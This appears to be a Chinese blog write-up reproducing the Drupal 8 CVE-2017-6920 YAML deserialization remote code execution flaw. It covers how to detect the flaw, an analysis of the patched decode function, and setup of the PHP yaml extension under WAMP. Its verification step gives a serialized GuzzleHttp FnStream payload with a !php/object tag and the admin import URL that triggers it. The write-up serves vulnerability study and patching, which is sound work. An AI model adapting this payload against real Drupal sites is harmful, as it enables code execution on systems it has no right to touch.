Drupal远程命令执行漏洞复现

漏洞描述

Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。

漏洞检测

针对该漏洞,可采用两种方法进行检测:

方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞;

image.png

方法二:在Drupal根目录下找到文件/core/lib/Drupal/Component/Serialization/ YamlPecl.php,定位到函数public static function decode($raw),如果该函数代码不包含" ini_set('yaml.decode_php', 0);"调用,则存在该漏洞;否则,不存在该漏洞。

这是存在该漏洞的代码块

image.png

这是修复后的

image.png

漏洞分析

通过两个版本的文件可以发现漏洞的触发点,如上图。。
可以看到,8.3.4以后的版本 decode函数的开始处增加了如下的代码:

static $init; 
if (!isset($init)) 
{ // We never want to unserialize !php/object. 
ini_set('yaml.decode_php', 0); 
$init = TRUE; 
} 

漏洞所在函数decode的触发点代码如下:

$data = yaml_parse($raw, 0, $ndocs, [ 
YAML_BOOL_TAG => '\Drupal\Component\Serialization\YamlPecl::applyBooleanCallbacks', ]); 

decode函数的参数$raw被直接带入了yamlparse函数中,文档官方对于yamlparse函数的描述如下:

yamlparse
(PECL yaml> = 0.4.0)yaml_parse  - 解析YAML流
描述 
mixed yaml_parse(string $ input [,int $ pos = 0 [,int&$ ndocs [,array $ callbacks = null]]])将全部或部分YAML文档流转换为PHP变量。
参数 
输入要解析为YAML文档流的字符串。
pos从流中提取文档(所有文档为-1,第一个文档为0,...)。
ndocs如果提供了ndocs,则会填充流中找到的文档数量。
回调YAML节点的内容处理程序。YAML标记的关联数组=>可调用映射。有关更多详细信息,请参阅解析回调。
返回值 
以适当的PHP类型返回在输入中编码的值,或者在失败时返回FALSE。如果pos为-1,则将返回一个数组,其中每个在流中找到的文档都有一个条目。    

第一个参数是需要parse成yaml的文档流。从上文来看,只有yaml_parse的第一个参数是外部可控的。官方对这个函数有一个特别的说明,也就是该漏洞的触发原理:

Notes 
Warning Processing untrusted user input with yamlparse() is dangerous if the use of unserialize() is enabled for nodes using the !php/object tag. This behavior can be disabled by using the yaml.decodephp ini setting. 
警告:如果为使用!php / object标记的节点启用了unserialize(),则使用yamlparse()处理不可信用户输入是非常危险的。这种行为可以通过使用yaml.decodephp ini设置来禁用。

即可以通过!php/object来声明一个节点,然后用这个!php/object声明的节点内容会以解序列化的方式进行处理;如果要禁止这样做,就通过设置yaml.decode_php来处理,这就是官方补丁在decode函数前面加的那几行代码因此。 ,这个远程代码执行漏洞的罪魁祸首首当是yaml_parse函数可能会用反序列化的形式来处理输入的字符串,从而导致通过反序列化类的方式来操作一些危险类,最终实现代码执行。显然,控制decode函数的参数即可触发该漏洞先定位。decode函数的调用位置,在/core/lib/Drupal/Component/Serialization/Yaml.php中第33行发现:

public static function decode($raw) {
$serializer = static::getSerializer(); 
return $serializer::decode($raw); 
}

函数该调用了getSerializer函数,该跟踪函数在/core/lib/Drupal/Component/ Serialization/Yaml.php中第48行发现:

protected static function getSerializer() {
if (!isset(static::$serializer)) {
  // Use the PECL YAML extension if it is available. It has better
  // performance for file reads and is YAML compliant.
  if (extension_loaded('yaml')) {
    static::$serializer = YamlPecl::class;
  }
  else {
    // Otherwise, fallback to the Symfony implementation.
    static::$serializer = YamlSymfony::class;
  }
}
return static::$serializer;
} 

如果存在YAML扩展,$serializer就使用YamlPecl类,然后调用YamlPecl这个类中的decode函数;如果不存在YAML扩展,就用YamlSymfony类中的decode。函数显然,一定要迫使代码利用YamlPecl类中的decode函数,这需要引入YAML扩展
我是在windows环境下测试的,用的wamp,所以只说在wamp中引入yaml扩展
1、先看下自己php的编译版本
Architecture : x86          编译系统架构:X86代表32位系统,X64代表64位系统
Thread Safety     : enabled       线程安全: enabled 代表线程安全 disabled 非线程安全
看下自己php的版本
安装的时候去 http://pecl.php.net 搜索相对于的扩展
nts--- 代表非线程安全 ts代表线程安全
找打合适i版本和把dll放在php扩展目录下即可。
想了解Linux下,看 PHP-yaml 安装
(1)YAML编译
在http://pecl.php.net/package/yaml下载TGZ源码包
(2)引用扩展
将然后php_yaml.dll放入PHP扩展文件夹下,然后修改php.ini中,将extension_dir写成phpyaml.dll所存放的目录,然后加上extension=php_yaml.dll。

image.png

image.png

最后重启apache的,看到的phpinfo中有YAML扩展,就说明安装成功,如图:


image.png

漏洞验证

1.序列化一个GuzzleHttp\Psr7\FnStream类,序列化后的字符串,给该序列化字符串加上yaml的!php/object tag(注意一定要转义),最后得到的字符串如下:

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

2.登录一个管理员账号,访问如下url: http://localhost/drupal830/admin/config/development/configuration/single/import,然后我们进行如图所示的操作:

image.png

然后点击import按钮,就会执行phpinfo函数。


image.png

本文参考内容: https://paper.seebug.org/334/
http://baijiahao.baidu.com/s?id=1581449721290524096&wfr=spider&for=pc

你可能感兴趣的:(Drupal远程命令执行漏洞复现)